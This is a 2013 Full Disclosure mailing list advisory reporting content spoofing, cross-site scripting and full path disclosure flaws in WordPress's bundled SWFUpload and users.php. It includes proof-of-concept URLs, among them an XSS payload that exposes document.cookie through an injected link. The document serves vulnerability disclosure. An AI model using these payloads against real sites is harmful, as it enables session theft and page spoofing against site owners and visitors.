Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

CS, XSS and FPD vulnerabilities in WordPress

From: "MustLive" <mustlive () websecurity com ua>
Date: Tue, 9 Jul 2013 23:51:22 +0300
Hello list!

These are Content Spoofing, Cross-Site Scripting and Full path disclosure
vulnerabilities in WordPress.

At WordPress 3.5.2 release (the same at 3.5.1 release), WP developers
mentioned about multiple fixed holes, but not about all - to make it looks
like there were less fixed holes. So I'm revealing this information for you.

In March I wrote about Content Spoofing and Cross-Site Scripting
vulnerabilities in SWFUpload (http://securityvulns.ru/docs29181.html) (which
is also bundled with WordPress), and I mentioned that they concerned only
versions before WordPress 3.3.2 and were fixed in version 3.3.2 together
with 2012's XSS hole. But I checked these holes in older versions of WP and
in version 3.5.1.

And as I found two weeks ago, these CS and XSS vulnerabilities were fixed
exactly in WordPress 3.5.1. So versions 3.3.2 - 3.5 are still vulnerable,
and in version 3.5.1 the developers included updated version of SWFUpload,
without mentioning about these fixes (they like to do such things), only
mentioned about the fixes in SWFUpload in version WP 3.5.2.

There are fixed vulnerabilities in WordPress 3.5.2, which are not mentioned
in announcement and codex. Like below mentioned Full path disclosure
vulnerability (which I disclosed last week), even they have mentioned about
FPD during upload.

-------------------------
Affected products:
-------------------------

For CS and XSS vulnerable are versions WordPress 2.7 - 3.5.

For FPD vulnerable are versions WordPress 3.4 - 3.5.1.

----------
Details:
----------

Content Spoofing (WASC-12):

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

It's possible to inject text, images and html (e.g. for link injection).

Cross-Site Scripting (WASC-08):

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Code will execute after click. It's strictly social XSS.

Full path disclosure (WASC-13):

http://site/wp-admin/users.php?s=http://

There is FPD when search string starts from http:// or https://.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: